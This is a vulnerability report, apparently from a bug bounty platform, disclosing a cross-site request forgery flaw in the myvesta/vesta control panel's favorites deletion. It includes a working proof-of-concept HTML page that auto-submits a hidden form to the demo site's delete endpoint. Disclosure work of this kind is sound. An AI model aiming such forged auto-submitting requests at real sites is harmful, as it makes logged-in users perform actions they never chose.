Cross-Site Request Forgery (CSRF) in myvesta/vesta
Valid
Reported on
Aug 24th 2021
✍️ Description
Attacker is able to "delete" an element from favorite. this vulnerability happens on some sections. for example on “Firewall” tab list/firewall/
🕵️♂️ Proof of Concept
1.when you logged in open this POC.html in a browser 2.you can check unintentionally first record deletes from favorite
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/delete/favorite/index.php">
<input type="hidden" name="v_section" value="firewall" />
<input type="hidden" name="v_unit_id" value="11" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of forging admin or user to unintentional delete element from favorite.
💥 Test
Tested on Edge, Firefox, chrome and safari 📍 Location index.php#L1 📝 References csrf
Occurrences
References
We have contacted a member of the
myvesta/vesta
team and are waiting to hear back
2 years ago
Musio modified the report
2 years ago
to join this conversation